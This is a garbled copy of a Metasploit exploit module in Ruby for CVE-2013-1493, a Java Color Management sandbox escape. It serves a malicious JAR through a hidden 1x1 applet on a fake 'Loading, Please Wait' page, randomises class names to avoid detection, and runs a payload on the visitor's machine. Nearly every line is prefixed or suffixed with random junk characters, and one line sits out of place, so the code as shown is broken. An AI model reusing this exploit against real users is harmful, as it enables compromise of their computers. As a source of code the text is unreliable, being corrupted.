##
7 m7 X+ [6 c* o8 M4 p- ?
: N6 J7 W# H/ g- l* A/ g1 K# This file is part of the Metasploit Framework and may be subject to9 m) c4 F0 Z% r9 K: {( A. U
# redistribution and commercial restrictions. Please see the Metasploit8 f& J1 L8 ?% f
# web site for more information on licensing and terms of use.
% X/ _3 R$ H8 [) a! a# http://metasploit.com/! x2 \% R3 v9 ?2 y
##. Q( a8 P* J k' `- K" a
require ‘msf/core’
$ [4 o3 B( W# wrequire ‘rex’1 k( M5 E/ z. {0 p& _0 c
class Metasploit3 < Msf::Exploit::Remote
( g$ I% M! n9 v, tRank = NormalRanking
- @4 p- U; h3 ~) N/ q% u8 d* einclude Msf::Exploit::Remote::HttpServer::HTML: v- F4 e# ?* e' D
include Msf::Exploit::EXE+ B. r( ?# Z! ~+ q( n0 y: j1 L
include Msf::Exploit::Remote::BrowserAutopwn* F" z! }; O8 G7 d0 \& I
autopwn_info({ :javascript => false })9 q( {/ ?0 j, }4 P
def initialize( info = {} )
; P; T, k% P, \3 b" ssuper( update_info( info,9 L3 a6 I7 X" L+ H
‘Name’ => ‘Java CMM Remote Code Execution’,
0 \" P/ o1 f* }‘Description’ => %q{5 [- O( V0 g5 B, f; T
This module abuses the Color Management classes from a Java Applet to run
0 h; Y6 r- B5 S, karbitrary Java code outside of the sandbox as exploited in the wild in February
+ i( S5 {4 X+ e9 x1 f7 S8 Xand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41! G: ^# _$ I& L
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
; Y# Y- A6 X4 Q/ \4 |9 a2 C* j+ @' k( {systems. This exploit doesn’t bypass click-to-play, so the user must accept the java5 S, ~; v+ o: L3 _6 Q& y
warning in order to run the malicious applet.
4 \$ n2 u+ g6 ?},
% R/ @* F8 A+ r) U: n3 s( R‘License’ => MSF_LICENSE, Y4 J0 a1 M7 [8 {+ Z
‘Author’ =>
) L' |/ S3 H& C/ |# I8 j'Unknown', # Vulnerability discovery and Exploit
% z( a f! b7 L- m7 L8 e7 a/ y'juan vazquez' # Metasploit module (just ported the published exploit)" k" @) p9 R9 R9 e
],, F6 T" c3 i5 ^( q% n1 I5 x
‘References’ =>- [2 A4 J% q( Y- L! X
[4 G& S9 o+ Z+ s! x1 ]% |$ ]. r
[ 'CVE', '2013-1493' ],% A7 ~( g3 x! l; y
[ 'OSVDB', '90737' ],
' d4 l& a9 b" }$ l3 |& w[ 'BID', '58238' ],
1 f7 P* O: _( \+ @7 V[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
4 ^# Q5 T1 n$ o* ], n9 G, U[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
2 [8 }$ c8 g& ~1 f! t- C$ z5 T; g[ 'URL', 'http://pastie.org/pastes/6581034' ]
/ K. h- U, Q6 F$ Y0 o/ C5 _],
' t1 |/ q8 i! `0 h* \0 V8 i‘Platform’ => [ 'win', 'java' ],8 v3 J$ v! j/ s4 I7 S+ D5 H0 \# b
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
% P j' C+ w/ B. L B6 }- u‘Targets’ =>, o8 p3 \! e4 s' X8 }4 e
[
) g6 ?7 l+ \6 |5 v! o9 v[ 'Generic (Java Payload)',
) }+ X7 r6 {6 s: V" l8 \{! h: z! l _( W' E
'Platform' => 'java',
; N/ v+ m) L* q5 |! y ?'Arch' => ARCH_JAVA
) j7 l: X- H2 X' V3 R& p; E( Y6 V}
: q7 d4 Z% Q0 A, P' i]," k8 b/ v1 T. W
[ 'Windows x86 (Native Payload)',& H4 `0 Y' \$ @ a3 l+ T
{
# J, C3 C: x$ N- F7 d: @- t. W'Platform' => 'win',/ {) z) U/ t; H. ?0 S8 ]' }3 t
'Arch' => ARCH_X86
2 |! ^* }+ C! q# e6 b% Y}
8 h+ M& {+ u& L) U- G]
# w% O% C8 n" m& W p9 \2 z# []," t/ T; d( Z" m! r( |6 n
‘‘DisclosureDate’ => ‘Mar 01 2013′; }+ ]7 ^, W- _9 b7 `! N
))
& e; ^; Y/ w" ]3 O# _& {0 _) Mend
2 `/ e! H" h V0 Ldef setup! k5 m. U; N! r
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)2 k+ B+ T" \. v+ R* f* a
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }4 q1 l5 t6 y/ v/ O/ m
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)! q! W) v( |+ z( O. R7 _1 I
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 F0 \& q0 A( S" F# i9 Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
" Z k; U2 y& C- p/ w@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( g1 b( K8 R- k% R6 w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)9 e' W, P. e2 K
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) \6 d& r! m/ g9 ?% j0 O( P; _9 k
@init_class_name = rand_text_alpha(“Init”.length)! S2 J2 z' u T K) b- [' k
@init_class.gsub!(“Init”, @init_class_name)
' P$ s+ R, F3 {- b: {5 P, Dsuper2 n; w5 L/ g( B. ` Z; q1 u! a! M
end
3 ], T: w' H5 @. S' W+ ?5 s# Y7 Pdef on_request_uri(cli, request)
6 o3 T0 \% L7 ]1 Fprint_status(“handling request for #{request.uri}”)
% g5 I% l. p- t) \# B0 Wcase request.uri
! U' p( Z4 d" {7 uwhen /\.jar$/i
: i2 h! g6 e+ C# w( |/ xjar = payload.encoded_jar
5 T6 X! Q; c- k: G- V2 |# z$ bjar.add_file(“#{@init_class_name}.class”, @init_class)
+ T, G+ I! L1 f# S5 Ujar.add_file(“Leak.class”, @leak_class)
6 O$ m& \3 r" o! ~3 R% Y- l- Qjar.add_file(“MyBufferedImage.class”, @buffered_image_class)9 {/ r7 T7 N8 _$ T
jar.add_file(“MyColorSpace.class”, @color_space_class)
1 x# a; k! W* VDefaultTarget’ => 1,4 y" ~+ X% G+ J5 s9 s
metasploit_str = rand_text_alpha(“metasploit”.length)
; i! T5 a& C" G) w* p7 T* Npayload_str = rand_text_alpha(“payload”.length)6 M/ V/ [* o4 x _! @) a
jar.entries.each { |entry|/ u# X) R7 b6 G
entry.name.gsub!(“metasploit”, metasploit_str)) k% M$ o; o: ~0 H9 |
entry.name.gsub!(“Payload”, payload_str)
. S: K% b+ w. M1 A0 Q* i2 jentry.data = entry.data.gsub(“metasploit”, metasploit_str)
& U+ C4 ?- S4 V9 z) e$ G3 w) dentry.data = entry.data.gsub(“Payload”, payload_str)
& s& h% r7 n0 a1 m, O/ O}
4 a9 z0 ]# H4 J3 W0 K: s9 ]jar.build_manifest
4 j1 M# m) [% w- ^% [send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })/ }5 C0 R* Q: q' P
when /\/$/
6 E% |1 K3 w* p" D. Y3 S* kpayload = regenerate_payload(cli)
+ X: d% `: U8 T3 N7 q9 [% H( yif not payload
s# M% s! G( P# Y# zprint_error(“Failed to generate the payload.”)
S0 a. W, o' D5 R! p7 y+ A w# y& Xsend_not_found(cli)4 x3 v' f/ m+ {: F5 o2 S
return
8 l- T# Y9 p" F7 I. yend2 x' M( S% k3 F. ?
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })& i; s" P: {% t% u
else
9 f" V% ]" o) D U8 _/ \3 qsend_redirect(cli, get_resource() + ‘/’, ”)2 i4 ?$ ?8 w+ V3 o3 ]1 D
end/ L0 M' J) p# T+ i# m
end9 E& |: ` H7 ]2 ?$ q$ N2 T' g
def generate_html& L+ B; b+ {: X5 R p/ O. L5 C
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
) M/ _5 I0 Z1 j, m2 z7 shtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|/ m# |6 Q+ G+ s/ r
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
7 U9 }, v6 ]9 N M8 Uhtml += %Q|</applet></body></html>|: Q _/ @/ K; X
return html
2 X, M: T( O, ^; Eend* T( L' ^5 b) T& t
end
4 S8 U2 b. k y7 M8 i. J! i) Aend
+ K' x- h- u- A/ O& b4 C |